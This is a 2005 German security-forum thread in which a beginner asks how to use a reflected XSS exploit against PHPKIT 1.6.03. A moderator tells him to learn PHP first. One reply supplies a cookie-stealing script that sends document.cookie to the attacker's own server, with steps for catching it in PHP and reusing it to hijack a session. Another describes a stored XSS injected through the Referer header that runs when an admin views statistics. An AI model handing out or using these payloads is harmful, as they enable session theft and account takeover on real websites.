Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
(In)security allgemein Sicherheit, Anonymität im Netz. Schutz und Maßnahmen. Prävention und Konzepte. Sicherheitsarchitekturen allgemein und auf der Netzwerkebene.

Frage bzgl. PHPKIT Exploit

Diskussion: Frage bzgl. PHPKIT Exploit im Forum (In)security allgemein, in der Kategorie Security Area; Anzeige HI ! Ich habe einen PHPKIT 1.6.03 Exploit rausgesucht und versuchte mich damit mal etwas auseinander zu setzen, wobei ...

Antwort
Alt 08.03.05, 21:10   #1 (permalink)
bID
 
Registriert seit: 08.03.05
bID Leistung: Facit NTK
Likes: 0
Standard Frage bzgl. PHPKIT Exploit

Anzeige

HI !
Ich habe einen PHPKIT 1.6.03 Exploit rausgesucht und versuchte mich damit mal etwas auseinander zu setzen, wobei dann folgende Fragen aufgetaucht sind :

1) Wie würde man diesen Exploit anwenden ( stark theoretisch ) und was ist mit dem <script>....</script> gemeint ? Muss ich etwas selber scripten oder muss ich den so verwenden wie er geschrieben ist ??? Wenn ich den so anwende bekomme ich nur eine meldung als MD5-Hash oder so.

http://www.example.com/phpkit/popup.php?img="><script>alert(document.cookie)</script>

Ich beschäftige mich noch nicht lange mit dem Thema.....also wenn ich da irgendeinen Müll geschrieben habe....sry

thnx4replies

bID ist offline   Mit Zitat antworten
Alt 08.03.05, 21:26   #2 (permalink)
Administrator
 
Benutzerbild von Mackz
 
Registriert seit: 02.10.01
Mackz Leistung: Pentium IMackz Leistung: Pentium I
Likes: 30
Standard

http://www.cgisecurity.com/articles/xss-faq.shtml
__________________
RL sux big time... auch 2012!

Deleting pr0n is like killing your best friend

[HaBo] bei Facebook - Werde Fan
Mackz ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 08.03.05, 21:52   #3 (permalink)
Moderator
 
Benutzerbild von Elderan
 
Registriert seit: 30.03.04
Elderan Leistung: 8086
Likes: 14
Standard

Hallo,
Zitat:
PHPKIT 1.6.03 Exploit rausgesucht .... Ich beschäftige mich noch nicht lange mit dem Thema
Schlechte kombination.

Also falls du Exploits wirklich verstehen willst, dann solltest du natürlich zuerst PHP lernen, evt. noch die Grundlagen von HTML & JavaScript.

Zitat:
Wenn ich den so anwende bekomme ich nur eine meldung als MD5-Hash oder so.
Lerne PHP, lerne wie man Cookies normalerweise setzt, und dann weißt du was dir die Ausgabe bringt.

Aber ohne Kenne, kommste nicht weit.
Elderan ist offline   Mit Zitat antworten
Alt 10.03.05, 15:53   #4 (permalink)
bID
Themenstarter
 
Registriert seit: 08.03.05
bID Leistung: Facit NTK
Likes: 0
Standard

thnx erstmal !
Eine frage habe ich noch : was kann man zwischen "<script>alert(document.cookie)</script>" schreiben ?
da kann man doch verschiedene befehle eingeben oder ??? Aber alles nur in HTML ???
thnx
bID ist offline   Mit Zitat antworten
Alt 18.12.05, 21:24   #5 (permalink)
 
Registriert seit: 17.12.05
Closed Leistung: Facit NTK
Likes: 0
Standard

brauchst nen webserver dafür. hier ein kleines beispiel:
Code:
<script>document.location=?http://deinserver.de/xss.php?cookie=?+document.cookie</script>
so könnte dein xss scriptchen aussehen

jetzt musste das cookie nur noch mit nem php script auf deinem server auffangen und dieses dann mit deinem ersetzen

das wars.

wenn du dafür noch nen kleinen denkanstoß brauchst, dann pn an mich

nachtrag: hab gerade den link gesehen. sorry, aber da steht alles genau beschrieben

also vergiß meine antwort einfach hast sie ja schon gehabt
Closed ist offline   Mit Zitat antworten
Alt 19.12.05, 15:09   #6 (permalink)
 
Registriert seit: 23.05.05
Xalon Leistung: Facit NTK
Xalon eine Nachricht über ICQ schicken
Likes: 0
Standard

Bissl alt das Topic,oder

Xalon

P.S.ie beste Sicherheitslücke am PHPKIT find ich ist die XSS Lücke die man beim Referer angeben kann,wenn ein Admin sich dann die Statistiken anschaut wird der Code ausgeführt:
Referer: <script>alert("HAcked ;-)")</script>
Xalon ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Security Area » (In)security allgemein » Frage bzgl. PHPKIT Exploit
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
PHPKit vs. Joomla DerBastian Webmaster-Security 3 23.07.07 17:02
newbie frage bzgl. programmiersprachen Sic! Code Kitchen 17 31.01.07 18:10
Phpkit Bug? Plastikman (Web-) Design und webbasierte Sprachen 0 05.10.03 17:21
Frage aus Interesse bzgl. ME-Bootfehler non Windows 2 03.09.03 20:09


1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61